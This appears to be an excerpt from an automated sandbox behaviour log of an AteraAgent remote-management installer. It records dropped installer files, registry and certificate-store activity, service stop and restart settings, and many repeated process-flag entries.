                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI87B3.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C79.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8B30.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7013.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
